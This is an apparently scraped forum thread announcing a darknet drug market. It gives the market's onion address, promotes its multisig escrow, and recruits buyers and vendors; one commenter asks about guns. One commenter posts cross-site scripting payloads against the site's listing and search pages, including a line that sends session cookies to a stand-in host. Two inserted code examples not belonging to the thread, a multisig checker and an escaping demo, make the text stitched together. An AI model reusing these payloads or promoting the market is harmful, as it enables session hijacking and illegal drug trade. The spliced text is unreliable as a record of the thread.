Absolem is officially open for business! (All-Drug market)

A couple of weeks ago we did the first half of the Absolem/Havana market launch when we launched the Havana market for beta testing. Well, now here's the main event. The all-drug market Absolem is now up and running.

You can check it out at absolem6indyslug.onion


Buyer features:

Vendor features:


If you're curious about the name, Absolem is the name of the hookah-smoking caterpillar who gave Alice mushrooms in Wonderland. Absolem market, like Havana, is a pure multi-sig market. Specifically that means Absolem will have no market-controlled wallets, no traditional escrow, and limited FE at buyer option, no exit scams, no theft.

But don't let the word multisig scare you off. Try out a purchase to see how easy it is to buy on Absolem. We have a $1.00 sample listing so you can see how easy it is to use. And we'll even refund your $1.00 when you complete a transaction. The multisig is simple for buyers to use, but under the hood there are some advanced features that beat anything competing markets have to offer.

Even if there is a market-ending catastrophe, vendors will not lose the escrow funds, and Absolem doesn't require complicated arrangements between buyer and vendor to make that work. Absolem, like its sister market, Havana, is a drugs only market. There will be no fraud, carders, weapons, counterfeiters, or assassins. Initially Absolem is open to registration for North American vendors only.

We will be expanding to global coverage in the near future. Vendor accounts are by application or invitation only and limited to the best vendors in their product categories. We don't understand why other markets allow just anyone to set up a store (with or without a bond, a bad vendor is a bad vendor). We're pretty sure a market doesn't need 10,000+ products for it to have an excellent selection of merchandise by top vendors with products across all price ranges.

We're trying something different here that we hope makes a big difference. We hope you like what you see. If you want to see some of your favorite vendors on a safe multisig market, ask them to list their products at Absolem.


About the SQL/Javascript Injections found by /u/Satoshi-

We have talked with him and have concluded that the vulnerabilities were in fact false positives. The clearnet embedded links have been removed. We would like to thank him for taking time to work with us and figure this out.


Comments


[28 Points] _Colorado_:

This might be the one folks. I can't find any flaws yet.

*First person to post a thorough security audit that is verified accurate by the community will get a 0.3 BTC bounty from me.

**/u/AbsolemHavanaMarkets I invite you to respond to the findings of /u/satoshi-

***/u/Satoshi- has collected the bounty for their efforts.

AbsolemHavanaMarkets

"This is correct. /u/Satoshi- has been a great help to us."


[17 Points] assnapken:

Absolutely beautiful market. I'm excited to give a try soon.


[12 Points] None:

I really enjoy the layout and a multi-sig-only market is definitely needed so props for creating one. I do have a question though - let's say your market goes down. You get paralyzed in a car crash, LE infiltrates, whatever. Don't people need to have the vendor's alt contact so they can contact them to finalize in the event of market closure? With that question in mind, I don't know a lot about multisig, and I'm assuming it is 2-of-3.


[4 Points] kahrmine:

What's your buyer history feature like for solving disputes? Is it based on total # of purchases or amount of bitcoin spent? Any way to import or verify buyer accounts on another market?

It'd be a cool feature to have that's not seen on other markets and could be used to build a "trusted" buyers list.


[4 Points] motsanciens:

How in the HELL did you manage to get that vanity onion?


[3 Points] firstpostthesecond:

How does the vendor and customer know that you are not doing a 2 of 4 transaction secretly since you are creating the transaction?


[2 Points] mjvej4f:

Looks promising, and nice layout as well. Will be paying close attention to this market :)


[2 Points] None:

Wow, great market


[2 Points] MaltoseMaltase:

Shit looks good.

Amused about the 'shipping and returns' policy, Lmao as if any vendor will ever let you return an item.

Also why is the option only for shipping to United States on the left sidebar?


[2 Points] dnmPerson:

I just read about multi-sig and I have a few questions about your market. This scenario, I assume, generally describes a typical transaction:

"Trustless Escrow

Alice wants to send Bitcoin to Bob, but only if Bob delivers the merchandise he has promised. Bob wants to ensure he is paid for his merchandise. They both trust Trent to adjudicate a dispute but do not wish to trust him with the funds. They create a 2-of-3 multi-sig address with one key each from Alice, Bob and Trent. If the transaction goes smoothly, Alice and Bob can jointly release the funds without Trent’s involvement. If there is a dispute, Trent can adjudicate, and can move the funds in conjunction with either Alice or Bob. During the course of the transaction, the Bitcoin is effectively in a kind of limbo, since no one person can move the funds on his own."

link: https://coincenter.org/2015/01/multi-sig/

1) What happens if Bob sends something to Alice, Alice doesn't want to finalize, and Trent loses his key because he is shut down? Is there an auto-finalize system in place independent of Trent (i.e. a backup end-of-world server of some sort), and who does it favor?

Disputes are settled based on the vendor's policy that the buyer agrees to before buying.

2) So, how is this not an FE option again?

3) I don't understand multi-sig very well. I assume there is a way to ensure that if Trent goes down and there is no dispute between Alice and Bob, that there is still a way to complete the transaction. Is this implemented? If this is not implemented how can a user even ensure that the market is multi-sig?

4) How are you going to make money? Will you eventually have a vendor buy-in or bond, and what cut will you take on transactions?

5) How long after an order will you be able to leave a review and will this time be dated from completion/resolution, or the placement of the order?
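The questions in this thread about telling a real 2-of-3 escrow from a quietly built 2-of-4 come down to reading the redeem script yourself. The following is an added example, not part of the thread and not the market's code; it assumes the escrow uses the standard redeem script `OP_m <pubkeys> OP_n OP_CHECKMULTISIG` and that the script is disclosed to both parties. The function names and sample keys are constructed for illustration.

```python
OP_1, OP_16, OP_CHECKMULTISIG = 0x51, 0x60, 0xAE

def parse_multisig(script: bytes):
    """Return (m, [pubkeys]) for OP_m <pk>... OP_n OP_CHECKMULTISIG, else raise."""
    if len(script) < 3 or script[-1] != OP_CHECKMULTISIG:
        raise ValueError("not a bare multisig script")
    if not (OP_1 <= script[0] <= OP_16 and OP_1 <= script[-2] <= OP_16):
        raise ValueError("bad m or n opcode")
    m, n = script[0] - 0x50, script[-2] - 0x50
    keys, i, end = [], 1, len(script) - 2
    while i < end:
        size = script[i]                      # push length: 33 or 65 byte pubkey
        if size not in (33, 65) or i + 1 + size > end:
            raise ValueError("unexpected push in key list")
        keys.append(script[i + 1:i + 1 + size])
        i += 1 + size
    if len(keys) != n or not 1 <= m <= n:
        raise ValueError("key count does not match n")
    return m, keys

def escrow_is_as_agreed(script: bytes, my_key: bytes, other_keys, m: int = 2) -> bool:
    """True only if the script is exactly m-of-n over my key and the expected keys."""
    try:
        got_m, keys = parse_multisig(script)
    except ValueError:
        return False
    expected = {my_key, *other_keys}
    return got_m == m and len(keys) == len(expected) and set(keys) == expected

# Constructed sample data (not real public keys): 0x02 prefix + 32 filler bytes.
def sample_key(tag: int) -> bytes:
    return b"\x02" + bytes([tag]) * 32

def build_script(m: int, keys) -> bytes:
    body = b"".join(bytes([len(k)]) + k for k in keys)
    return bytes([0x50 + m]) + body + bytes([0x50 + len(keys), OP_CHECKMULTISIG])

BUYER, VENDOR, MARKET, EXTRA = (sample_key(t) for t in (1, 2, 3, 4))

if __name__ == "__main__":
    print(escrow_is_as_agreed(build_script(2, [BUYER, VENDOR, MARKET]), BUYER, [VENDOR, MARKET]))
    print(escrow_is_as_agreed(build_script(2, [BUYER, VENDOR, MARKET, EXTRA]), BUYER, [VENDOR, MARKET]))
```

The check only means something if the address being funded is the hash of this exact script; confirming that is outside this example.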


[2 Points] darknetmarket:

Can't wait to see how this thing does, everything looks very slick so far. Long live Havana!


[2 Points] BMRr:

Can someone correct me if I'm wrong, but 100% anonymous feedback will promote feedback padding, correct? If you can't see who left the feedback they can make tons of purchases with the same account? Besides, who gives a shit if you see my account name, I don't use it for anything else.


[2 Points] ohThisUsername:

Why does it say "Hi Chaunt36. Welcome back!" When my username is not Chaunt36?

This looks fantastic though. I hope it all works out and some good vendors hop on board.

Edit: When I try sending a message to my actual username it says "No user exists with that alias".


[2 Points] 100MphNeurons:

I've spent a while (like most of today I guess) tinkering with the XSS stuff. I don't get what the server is doing exactly, making it a bit hard to find a reasonable fully weaponized XSS. The listings page slams stuff on them into a few tags (two forms and two spans). http_this_isnt_a_link.onion/listings/."><h1>Hello</h1><" for instance will pop out a few of them. This would be trivial to replace with <script>... but the latest browser bundle has a bunch of anti-XSS stuff. If you're in anything but Chrome though, you could directly do <script src=somewhere> or <script>(function(){document.body.outerHTML=btoa("....")})() .. and so on.

The search function can be injected into and you can get it to execute (search for hi"a><script id='Q'>(function(a){a('Q').outerHTML='<h1>HI</h1>'})(document.getElementById)</script><" for instance), but it's a POST rather than a GET so while it'll get you past XSS blocks there's no obvious automated version.

Another option would be to combine the two, using the first one to inject something useful (high use of <!--) to mod the search, then let it trigger and do something like document.write("<img src='http:slash/someplace.evil/?a="+document.cookie);.

Generally, none of this should be there (access with anything but Chrome and you're toast) but there's another layer left before there's an obvious way to weaponize. Several other pages do have more injection vulns, so something should be possible and if not, the busted layer (partial control of the html) should be closed before it does. Either way, it went down for maintenance so I guess that's the size of my poking at it for now.


[2 Points] 100MphNeurons:

Ok, so now my head has cleared a little and I've figured out why the POST inject thing matters. I'm sorry this doesn't lend itself very well to a screen shot. [EDIT] It's morning now and I realize this thread has gotten kind of old, the paste-place I put the example at no longer shows it correctly, and I probably should have messaged the admin instead of saying it publicly right off. There's basically an XSS issue in a form that allows any third party site visited while logged in (doesn't have to be opened, just not logged out) to hijack the session, either through browser manipulation or by getting the session cookies. I'll take this down for now until it's fixed and/or I set up a better example.
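The two comments above describe request values being reflected into form and span markup without encoding. The following is an added example, not from the thread and not the site's code, showing that reflection beside its fix (attribute-context output encoding), checked by parsing the result. The template is hypothetical, since the site's real markup is not shown, and the probe is the harmless string quoted in the comment.

```python
import html
from html.parser import HTMLParser

# Hypothetical template standing in for the markup the comments describe.
TEMPLATE = ('<form method="post" action="/search"><input name="q" value="{v}"></form>'
            '<span title="{v}">Results</span>')
OWN_TAGS = {"form", "input", "span"}
PROBE = '."><h1>Hello</h1><"'   # probe string quoted in the thread

def render_unsafe(value: str) -> str:
    # Reflects the request value verbatim: the flaw under discussion.
    return TEMPLATE.format(v=value)

def render_safe(value: str) -> str:
    # Encode for a quoted attribute: & < > " ' all become entities.
    return TEMPLATE.format(v=html.escape(value, quote=True))

class Collector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.seen = []
    def handle_starttag(self, tag, attrs):
        self.seen.append((tag, dict(attrs)))

def parse(markup: str):
    c = Collector()
    c.feed(markup)
    c.close()
    return c.seen

def injected_tags(markup: str):
    # Any element the template did not emit came from the reflected value.
    return [tag for tag, _ in parse(markup) if tag not in OWN_TAGS]

def reflected_values(markup: str):
    # What a browser would see as the attribute values after entity decoding.
    return [a[k] for _, a in parse(markup) for k in ("value", "title") if k in a]

if __name__ == "__main__":
    print("unsafe:", injected_tags(render_unsafe(PROBE)))
    print("safe:  ", injected_tags(render_safe(PROBE)))
```

Encoding at output keeps the user's text intact as data, which is why the safe rendering still shows the original search term in the field.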


[1 Points] Chilled_DNM:

Should open it to more than just North America soon. I look forward to trying it once you have.


[1 Points] superfuckinggay:

Very excited about this market. Do you take vendors from BB? I saw it only mentions Agora.


[1 Points] jackarse321:

The site looks promising.

My question is how is the site going to get $$? I doubt this is created and will be run for pure altruistic values. If I remember correctly on TMP, there were 2 separate wallet transactions, one where a portion was sent to the site, and then the other transaction that was for the purchase. Is this going to be set up the same way or is the funding going to come from the vendor side? I am excited about a true multi-sig market.


[1 Points] mayormaynotbefucked1:

Now you just need to convince a half decent German MDMA vendor to join up...


[1 Points] HulkVsMeth:

Will you support guns?


[1 Points] ShulginsCat:

Very minor, but the /api page shows "ERROR: Invalid API Key" which might give people a hint of which s/w you're using in the backend. May or may not be important, depending what's sitting behind it.


[1 Points] None:

Havana/Absolem is definitely a scam and insecure. They proved it by themselves using shills and exposing terrible coding practices. What a bunch of morons using templates for women clothing stores. Fuckin' gay scammers.


[1 Points] pieintheskyDNM:

This is the best looking market I've seen by a long shot. With multisig, too.


[1 Points] AllJoociedUP:

This is the kind of market I've been waiting for. None of the card dumps, Fullz Social Security Numbers, Amazon Reship, or any of that other crap that give LE bank backing in fighting the markets.

Kudos. I hope my vendors sign up on there. I am signing up. I really really hope it gains momentum. I always felt that if it was JUST drugs then the markets would be far less of a problem, and that the money services and carding section bring unwanted attention from LE and Banks.

Broke cops + Fat pocketed Banker > Broke cop + newly Broke user

when it comes to fighting DNM by LE.


[1 Points] None:

Now that's what I'm talkin about!


[1 Points] RIP_Havana_Absolem:

RIP You lasted a whole month without getting busted.


[0 Points] None:

TheRealDeal has been up for a bit now and was the first to implement this type of multisig, thank god there are more popping up now.


[-1 Points] swagmaster4204204200:

What's the significance of the name?


[-4 Points] fagfuck666:

Your market sucks ass